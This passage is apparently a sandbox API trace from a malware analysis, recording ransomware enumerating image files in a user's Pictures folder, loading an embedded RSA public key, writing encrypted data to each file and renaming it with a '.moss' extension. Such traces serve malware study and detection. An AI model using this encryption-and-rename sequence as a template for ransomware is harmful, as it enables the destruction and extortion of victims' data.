ftLastWriteTime.dwHighDateTime=0x1d5dece, nFileSizeHigh=0x0, nFileSizeLow=0x805c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jJqHNDTsO8rPiTJ.bmp", cAlternateFileName="JJQHND~1.BMP")) returned 1 [0171.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\jJqHNDTsO8rPiTJ.bmp") returned=".bmp" [0171.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\jJqHNDTsO8rPiTJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\jjqhndtso8rpitj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.912] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=32860) returned 1 [0171.912] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.916] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8036, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.916] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.916] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x805c, lpOverlapped=0x0) returned 1 [0171.916] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.916] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.918] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.918] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.918] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.918] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.918] GetLastError () returned 0x0 [0171.918] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.918] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.918] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.918] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.918] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.918] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.918] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.919] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x805c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.919] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.919] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.919] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\jJqHNDTsO8rPiTJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\jjqhndtso8rpitj.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\jJqHNDTsO8rPiTJ.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\jjqhndtso8rpitj.bmp.moss")) returned 1 [0171.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.920] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.920] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.921] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.921] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7cefce0, ftCreationTime.dwHighDateTime=0x1d5dd26, ftLastAccessTime.dwLowDateTime=0xcadfb5c0, ftLastAccessTime.dwHighDateTime=0x1d5d811, ftLastWriteTime.dwLowDateTime=0xcadfb5c0, ftLastWriteTime.dwHighDateTime=0x1d5d811, nFileSizeHigh=0x0, nFileSizeLow=0x3798, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kb8uL.gif", cAlternateFileName="")) returned 1 [0171.921] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\Kb8uL.gif") returned=".gif" [0171.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\Kb8uL.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\kb8ul.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.921] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=14232) returned 1 [0171.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.924] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3772, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.924] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.925] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.925] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x3798, lpOverlapped=0x0) returned 1 [0171.926] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.926] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.927] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.927] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.927] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.927] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.927] GetLastError () returned 0x0 [0171.927] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.927] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.927] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.927] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.927] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.927] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.927] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.928] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3798, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.928] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.928] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.928] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\Kb8uL.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\kb8ul.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\Kb8uL.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\kb8ul.gif.moss")) returned 1 [0171.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.929] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.929] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.930] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60956a0, ftCreationTime.dwHighDateTime=0x1d5db13, ftLastAccessTime.dwLowDateTime=0x60f44cd0, ftLastAccessTime.dwHighDateTime=0x1d5e3fa, ftLastWriteTime.dwLowDateTime=0x60f44cd0, ftLastWriteTime.dwHighDateTime=0x1d5e3fa, nFileSizeHigh=0x0, nFileSizeLow=0x9ddf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nhW90.bmp", cAlternateFileName="")) returned 1 [0171.930] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\nhW90.bmp") returned=".bmp" [0171.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\nhW90.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\nhw90.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.930] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=40415) returned 1 [0171.930] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.933] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9db9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.933] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.934] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x9ddf, lpOverlapped=0x0) returned 1 [0171.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.934] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.935] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.935] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.935] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.936] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.936] GetLastError () returned 0x0 [0171.936] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.936] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.936] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.936] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.936] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.936] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.937] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x9ddf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.937] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.937] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\nhW90.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\nhw90.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\nhW90.bmp.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\nhw90.bmp.moss")) returned 1 [0171.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.938] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.939] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.939] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7be73000, ftCreationTime.dwHighDateTime=0x1d5d8d5, ftLastAccessTime.dwLowDateTime=0xa3975e70, ftLastAccessTime.dwHighDateTime=0x1d5e2d7, ftLastWriteTime.dwLowDateTime=0xa3975e70, ftLastWriteTime.dwHighDateTime=0x1d5e2d7, nFileSizeHigh=0x0, nFileSizeLow=0x12a73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QD_MoREZj4xQrMk.gif", cAlternateFileName="QD_MOR~1.GIF")) returned 1 [0171.939] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\QD_MoREZj4xQrMk.gif") returned=".gif" [0171.939] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\QD_MoREZj4xQrMk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\qd_morezj4xqrmk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.939] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=76403) returned 1 [0171.939] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.942] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x12a4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.942] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.943] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x12a73, lpOverlapped=0x0) returned 1 [0171.944] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.944] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0171.945] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.945] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.945] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.945] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.945] GetLastError () returned 0x0 [0171.945] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.945] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0171.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0171.945] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.945] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.945] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.945] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.946] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.947] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x12a73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.947] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.947] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0171.947] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\QD_MoREZj4xQrMk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\qd_morezj4xqrmk.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\QD_MoREZj4xQrMk.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\qd_morezj4xqrmk.gif.moss")) returned 1 [0171.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.948] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0171.948] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.949] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0171.949] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3703caa0, ftCreationTime.dwHighDateTime=0x1d5e746, ftLastAccessTime.dwLowDateTime=0xdfdd6080, ftLastAccessTime.dwHighDateTime=0x1d5e5e0, ftLastWriteTime.dwLowDateTime=0xdfdd6080, ftLastWriteTime.dwHighDateTime=0x1d5e5e0, nFileSizeHigh=0x0, nFileSizeLow=0x15da1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R0VSd_xa3T76_EiBOSQI.gif", cAlternateFileName="R0VSD_~1.GIF")) returned 1 [0171.949] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\R0VSd_xa3T76_EiBOSQI.gif") returned=".gif" [0171.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\R0VSd_xa3T76_EiBOSQI.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ynvui8oa0e 4g2yjds\\r0vsd_xa3t76_eibosqi.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.949] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=89505) returned 1 [0171.949] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.952] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15d7b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.952] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.952] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, 